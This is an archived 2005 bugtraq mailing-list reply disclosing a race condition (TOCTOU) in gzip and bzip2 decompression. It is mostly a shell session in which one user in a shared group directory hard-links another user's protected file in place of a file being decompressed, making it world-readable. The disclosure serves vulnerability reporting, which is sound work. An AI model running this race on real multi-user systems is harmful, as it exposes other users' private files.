[38387] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: gzip TOCTOU file-permissions vulnerability

daemon@ATHENA.MIT.EDU (Theodor Milkov)
Fri Apr 15 12:43:02 2005

Message-ID: <425E0F54.3060100@icdsoft.com>
Date: Thu, 14 Apr 2005 09:36:04 +0300
From: Theodor Milkov <zimage@icdsoft.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Cc: 303927@bugs.debian.org
In-Reply-To: <20050413154049.GA30175@kitenet.net>
Content-Type: text/plain; charset=windows-1251; format=flowed
Content-Transfer-Encoding: 7bit

Joey Hess wrote:
> Martin Pitt wrote:
<cut>
>>Maybe I understood you wrong, could you please give a small test case
>>which describes the vulnerability exactly?
> 
> 
> I'm a wimp, so I will use gdb instead of writing some real exploit to
> win the race.

It is quite easy to win the race when the file that's being decompressed 
is big:

---
# adduser user-good
# adduser user-evil
# usermod -G src user-good
# usermod -G src user-evil
# mkdir /var/www/proj
# chown root.src /var/www/proj
# chmod 2775 /var/www/proj

user-good@zimage:/var/www/proj$ echo "Rather secret data" > secf.txt
user-good@zimage:/var/www/proj$ chmod 400 secf.txt
user-good@zimage:/var/www/proj$ ls -al secf.txt
  -r--------  1 user-good src 19 Apr 14 09:16 secf.txt

user-evil@zimage:/var/www/proj$ dd if=/dev/zero of=bigf.bin bs=1M count=256
user-evil@zimage:/var/www/proj$ gzip bigf.bin
user-evil@zimage:/var/www/proj$ chmod 666 bigf.bin.gz
user-evil@zimage:/var/www/proj$ ls -la secf.txt bigf.bin.gz
  -rw-rw-rw-  1 user-evil src 260543 Apr 14 09:17 bigf.bin.gz
  -r--------  1 user-good src     19 Apr 14 09:16 secf.txt

user-evil@zimage:/var/www/proj$ cat secf.txt
  cat: secf.txt: Permission denied

user-good@zimage:/var/www/proj$ gzip -d bigf.bin.gz

user-evil@zimage:/var/www/proj$ rm -f bigf.bin ; ln secf.txt bigf.bin

user-evil@zimage:/var/www/proj$ ls -la secf.txt bigf.bin
  -rw-rw-rw-  2 user-good src 19 Apr 14 09:17 bigf.bin
  -rw-rw-rw-  2 user-good src 19 Apr 14 09:17 secf.txt

user-evil@zimage:/var/www/proj$ cat secf.txt
  Rather secret data
---

The time between beginning of decompression and unlink+delete was about 
2 sec. and decompression has finished about 7-8 seconds later.

The same was tested and applyes to bzip2.

Best regards,
Theodor

--
Theodor Milkov
http://www.zimage.del.bg/
CCNA, CCNP, MCP


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[38387] in bugtraq

Re: gzip TOCTOU file-permissions vulnerability

daemon@ATHENA.MIT.EDU (Theodor Milkov)Fri Apr 15 12:43:02 2005

daemon@ATHENA.MIT.EDU (Theodor Milkov)
Fri Apr 15 12:43:02 2005